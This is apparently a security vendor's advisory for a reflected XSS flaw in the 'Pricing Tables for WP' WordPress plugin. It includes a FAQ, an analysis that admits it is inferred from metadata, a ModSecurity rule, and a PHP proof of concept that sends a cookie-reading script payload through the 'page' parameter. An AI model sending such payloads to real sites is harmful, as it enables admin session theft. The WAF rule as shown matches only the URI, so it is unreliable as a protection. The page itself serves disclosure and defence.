What is CVE-2026-6808?

CVE-2026-6808 is a reflected cross-site scripting (XSS) vulnerability found in the Pricing Tables for WP plugin for WordPress, affecting versions up to and including 1.1.0. This vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the ‘page’ parameter.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of the ‘page’ parameter. An attacker can craft a malicious URL that, when clicked by an authenticated administrator, executes injected scripts in the admin context.

Who is affected by this vulnerability?

Any WordPress site using the Pricing Tables for WP plugin version 1.1.0 or earlier is affected. Administrators should check their installed plugins to determine if they are using this specific plugin.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the Pricing Tables for WP plugin is installed and check its version. If it is version 1.1.0 or earlier, your site is at risk.

What is the severity level of this vulnerability?

CVE-2026-6808 has a CVSS score of 6.1, classified as Medium severity. This indicates that while exploitation requires user interaction, it can lead to significant security risks if successfully executed.

What are the potential risks of exploitation?

Successful exploitation can lead to full administrative compromise of the WordPress site. Attackers may steal session cookies, create rogue admin accounts, or install malicious plugins.

How can I fix or mitigate this issue?

The best course of action is to deactivate and remove the Pricing Tables for WP plugin immediately, as there is no patched version available. Regularly update your plugins and monitor for security advisories.

What does insufficient input sanitization mean?

Insufficient input sanitization refers to the failure to properly validate and clean user input before processing it. In this case, the plugin directly reflects the ‘page’ parameter in the HTML output without escaping it, allowing for script injection.

What is a proof of concept (PoC) in this context?

The proof of concept provided demonstrates how an attacker can exploit the vulnerability by crafting a malicious URL that includes a script payload. This shows how the vulnerability can be triggered in a real-world scenario.

How can I protect my WordPress site from similar vulnerabilities?

To protect your WordPress site, regularly update all plugins and themes, use security plugins for monitoring, and follow best practices for web security, including input validation and user permissions management.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change your passwords, check for unauthorized access or changes, and restore from a clean backup if necessary. Consider conducting a full security audit.

Where can I find more information about this vulnerability?

More information about CVE-2026-6808 can be found on the National Vulnerability Database (NVD) and security advisory sites. Keeping abreast of security news and updates is crucial for maintaining a secure WordPress environment.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-6808: Pricing Tables for WP <= 1.1.0 – Reflected Cross-Site Scripting via 'page' Parameter (awesome-pricing-tables-lite-by-optimalplugins)

CVE ID CVE-2026-6808

Plugin awesome-pricing-tables-lite-by-optimalplugins

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.1.0

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6808 (metadata-based): This is a Reflected Cross-Site Scripting (XSS) vulnerability in the “Pricing Tables for WP” plugin, versions 1.1.0 and earlier. An unauthenticated attacker can inject arbitrary web scripts via the ‘page’ parameter. The vulnerability has a CVSS score of 6.1 (Medium) due to the requirement for user interaction (a victim administrator clicking a crafted link). Atomic Edge research confirms this is a classic reflected XSS vulnerability arising from unsanitized input reflected directly in an admin page output.

The root cause is insufficient input sanitization and output escaping on the ‘page’ parameter. The plugin likely reads the ‘page’ parameter from a GET request and prints its value directly into the HTML of a WordPress admin page, without using esc_attr() or wp_unslash() with sanitize_text_field(). This conclusion is inferred from the CWE-79 classification and the vulnerability description. No code diff is available to confirm the exact file or function.

Exploitation requires tricking an authenticated administrator into clicking a crafted link. The attacker crafts a malicious URL like /wp-admin/admin.php?page=alert(‘XSS’) and delivers it to the target via email or social engineering. When the administrator clicks the link while logged into WordPress, the injected script executes in the admin context, allowing the attacker to perform actions like creating rogue admin accounts or stealing session cookies. The ‘page’ parameter is commonly used in WordPress admin pages to specify the plugin settings page.

Remediation requires the plugin to properly escape the ‘page’ output using WordPress’s esc_attr() function before printing it into the HTML. The plugin should also sanitize the input using sanitize_text_field() or similar. Since no patched version is available, administrators must deactivate and remove the plugin immediately.

Successful exploitation can lead to full administrative compromise of the WordPress site. An attacker can steal session cookies, create new administrator accounts, install malicious plugins, deface the site, or redirect visitors to external malicious sites.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6808 (metadata-based)
# Blocks reflected XSS via 'page' parameter in admin.php targeting Pricing Tables plugin
SecRule REQUEST_URI "@streq /wp-admin/admin.php" 
  "id:20266808,phase:1,t:urlDecode,t:lowercase,deny,status:403,msg:'CVE-2026-6808 reflected XSS via page parameter (Pricing Tables for WP)',severity:'CRITICAL',tag:'CVE-2026-6808',tag:'wordpress',tag:'xss'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6808 - Pricing Tables for WP <= 1.1.0 - Reflected Cross-Site Scripting via 'page' Parameter

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress installation URL

// XSS payload
$payload = urlencode('<script>alert(document.cookie)</script>');

// Construct the malicious URL
// The 'page' parameter is reflected without sanitization in admin pages
$vuln_url = $target_url . '/wp-admin/admin.php?page=' . $payload . '&other_param=test';

echo "[+] Sending XSS exploit to target...n";
echo "[+] URL: $vuln_urln";

// Initialize cURL
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $vuln_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
// Note: This PoC does not include admin authentication cookies.
// For a real attack, the attacker must deliver the crafted URL to an already-logged-in admin.

$response = curl_exec($ch);

if (curl_errno($ch)) {
    echo "[!] Error: " . curl_error($ch) . "n";
} else {
    // Check if payload appears in response to confirm reflection
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    echo "[+] HTTP Status: $http_coden";
    if (strpos($response, '<script>alert(document.cookie)</script>') !== false) {
        echo "[+] Vulnerability confirmed! Payload reflected in response.n";
    } else {
        echo "[-] Payload not directly reflected. Manual verification recommended.n";
    }
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6808?
Overview of the vulnerability
CVE-2026-6808 is a reflected cross-site scripting (XSS) vulnerability found in the Pricing Tables for WP plugin for WordPress, affecting versions up to and including 1.1.0. This vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the ‘page’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of the ‘page’ parameter. An attacker can craft a malicious URL that, when clicked by an authenticated administrator, executes injected scripts in the admin context.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Pricing Tables for WP plugin version 1.1.0 or earlier is affected. Administrators should check their installed plugins to determine if they are using this specific plugin.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify if the Pricing Tables for WP plugin is installed and check its version. If it is version 1.1.0 or earlier, your site is at risk.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-6808 has a CVSS score of 6.1, classified as Medium severity. This indicates that while exploitation requires user interaction, it can lead to significant security risks if successfully executed.
What are the potential risks of exploitation?
Consequences of a successful attack
Successful exploitation can lead to full administrative compromise of the WordPress site. Attackers may steal session cookies, create rogue admin accounts, or install malicious plugins.
How can I fix or mitigate this issue?
Recommended actions for administrators
The best course of action is to deactivate and remove the Pricing Tables for WP plugin immediately, as there is no patched version available. Regularly update your plugins and monitor for security advisories.
What does insufficient input sanitization mean?
Technical explanation of the issue
Insufficient input sanitization refers to the failure to properly validate and clean user input before processing it. In this case, the plugin directly reflects the ‘page’ parameter in the HTML output without escaping it, allowing for script injection.
What is a proof of concept (PoC) in this context?
Demonstration of the vulnerability
The proof of concept provided demonstrates how an attacker can exploit the vulnerability by crafting a malicious URL that includes a script payload. This shows how the vulnerability can be triggered in a real-world scenario.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To protect your WordPress site, regularly update all plugins and themes, use security plugins for monitoring, and follow best practices for web security, including input validation and user permissions management.
What should I do if I suspect my site has been compromised?
Response to a potential breach
If you suspect your site has been compromised, immediately change your passwords, check for unauthorized access or changes, and restore from a clean backup if necessary. Consider conducting a full security audit.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-6808 can be found on the National Vulnerability Database (NVD) and security advisory sites. Keeping abreast of security news and updates is crucial for maintaining a secure WordPress environment.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations